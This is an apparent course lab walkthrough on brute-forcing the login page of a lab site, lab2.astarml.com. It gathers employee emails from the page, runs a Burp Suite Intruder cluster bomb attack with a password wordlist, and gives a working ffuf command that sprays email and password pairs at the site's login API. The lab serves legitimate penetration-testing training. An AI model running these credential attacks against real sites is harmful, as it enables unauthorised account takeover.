Skip to main content

Brute Forcing Login Pages

Setup #

In order to complete this lab, you will use a program called ffuf on your virtual machine.

To install ffuf:


# Update your apt repository
sudo apt update

# Install ffuf
sudo apt install ffuf

In a real penetration test engagement, you would have access to extensive wordlists and may even compile your own. For this exercise, I’ve included several wordlists. One is short for use with burpsuite. The second is slightly longer, for use with ffuf. You can downlists files manually via the browser or via wget/curl.

Longer List

Shorter List

# Using wget
# Longer list
wget https://astar.fyi/files/custom_wordlist.txt -O custom_wordlist.txt
# Shorter list
wget https://astar.fyi/files/custom_wordlist_short.txt -O custom_wordlist_short.txt

# Using curl
# Longer list
curl -o custom_wordlist.txt https://astar.fyi/files/custom_wordlist.txt
# Shorter list
curl -o custom_wordlist_short.txt https://astar.fyi/files/custom_wordlist_short.txt

Brute Forcing a Login Page with Burpsuite #

Inside your virtual machine, start burpsuite.

A “Temporary project in memory” is fine, click next

burp_temp_project.png

Check “Use Burp defaults” and click Start Burp

burp_use_defaults.png

Once Burpsuite starts, click the “Proxy” tab, and then the “HTTP history” tab under that

burp_proxy_HTTP_History.png

You can now open FireFox and visit https://lab2.astarml.com

astarml_home.png

Once the page loads, turn on FoxyProxy by clicking the FoxyProxy Extension icon and selecting “http”, clicking outside of the extension will close the extension window.

foxy_proxy_http.png

Now when you refresh the page, you should see traffic starting in the http history tab

astarml_http_history.png

Just clean up the history a bit, right click on the row with Host = “https://lab2.astarml.com” and URL = “/” and click “Add to scope”

http_history_add_to_scope.png

Click yes in the pop up, this will ensure that only requests to “https://lab2.astarml.com” will be logged.

http_history_only_log_in_scope.png

Now that we have our logging set up properly, we need to enumerate the website to identify useful information. Scrolling down the page, we find employee information with their emails present.

contact_cards.png

Copy each email address into a text file on our virtual machine and save it as emails.txt. Ensure that each email is on its own line and do not include commas after each email

[email protected]
[email protected]
[email protected]
[email protected]

emails_txt_file.png

Navigate to the login page. We see that it utilizes a email and password combination.

login_page.png

We need to capture a login attempt, so we can try to login with any data, for example, just [email protected] and passwrd.

astarml_failed_log.png

This obviously doesn’t work, however, we will see the post request in our http history in burpsuite

http_history_failed_attempt.png

Right click on the request and select “Send to Intruder”

http_history_send_to_intruder.png

Now navigate to the Intruder Tab

intruder_tab.png

Change the attack type from “Sniper attack” to “Cluster bomb attack”. This will allow us to specify multiple payload locations. Alternatively, we could leave it on sniper, and then specify only a password list, manually change the email with each attempt.

intruder_change_to_cluster_bomb.png

To specify a payload location, hightlight the location (inside of the quotation marks)

payload_highlight.png

Then click the “Add” button at the top. This will add the payload symbols to the request.

payload_add_button.png
payload_symbol_email.png

Repeat this with the password location

payload_symbol_password.png

Now in the payload side of the screen, select the first payload option, this is the email location. Leaving it on “Simple list”, paste your email list into the payload list by copy it from your terminal and then clicking paste in the “Payload Configuration” section

payload_list_email.png

Make sure to uncheck the option “URL-encode these characters” option in the Payload Encoding section

uncheck_payload_encoding.png

We can now switch Payload Position to the second payload.

payload_position_password.png

We can list “Simple list” selected, but this time, click “Load…” instead of “Paste”. In the file explorer window that opens, navigate to where you saved the shorter custom wordlist, select it, and then click “open”.

payload_load.png

All the potential password will now be loaded into your payload list

payload_password_loaded.png

Again, uncheck the payload encoding option.

uncheck_payload_encoding.png

Now, when you click “Start Attack”, it will run through every combination of email and password. In the free community edition of Burpsuite, the speed of the attack is throttled and Burp will warn you about that. You can click “Ok” to continue

intruder_start_attack.png

You’ll see requests start to be made. Most of them are returning the status code 401 as they are unable to authenticate.

cluster_bomb_401s.png

You’ll want to look for requests with the status code returned 200, as this was a successful authentication attempt.

cluster_bomb_success.png

NOTE: Burpsuite is INCREDIBLY slow in its free version. Find the instructions for a faster CLI-based tool below.

Now that we have correct credentials, we can return to the application in the web browser and login manually using those credentials we found

login_success.png

We now reach a dashboard page with a terminal that we will use in the password cracking exercise

astarml_dashboard_page.png

Brute Forcing using FFUF #

ffuf is a request automation tool that allows us to automate the brute-forcing of our login request. It is significantly faster than burpsuite.

For this exercise, you can turn off the FoxyProxy extension as we won’t need it.

To capture the request, navigate to the login page, then open devtools in Firefox and then click into the “Network” tab.

devtools_network_tab.png

Now make a request in the browser so we have something to copy. You should see traffic in Dev Tools.

devtools_invalid_request.png

Right click on the request in Dev Tools and click “Copy Value” and “Copy of cURL”

devtool_copy_curl_.png

Paste this value in a notepad so we can work with the values easily

cURL_request_notepad.png

Now we can work on building our ffuf command. Start by stripping out unneeded information.

The only header we need is the “Content-Type” header

curl 'https://lab2.astarml.com/api/login' \
  -X POST \
  -H 'Content-Type: application/json' \
  --data-raw '{"email":"[email protected]","password":"test"}'

We’ll now use this data to build the ffuf command

# Command Template
ffuf -w <wordlist 1>:<variable name> -w <wordlist 2>:<variable name> -u <request url> -X <method> -H <header> -d <request body> -mc <status code to match> -rate <number of requests per second>

# Actual Command
ffuf -w ./custom_wordlist.txt:PASS -w ./emails.txt:EMAIL -u 'https://lab2.astarml.com/api/login' -X POST -H 'content-type: application/json' -d '{"email":"EMAIL","password":"PASS"}' -mc 200 -rate 5

After some time, you’ll find a matching combination and it will appear in the terminal.

ffuf_match.png

We can now use these credentials to log into the website and reach the dashboard page.

astarml_dashboard_page.png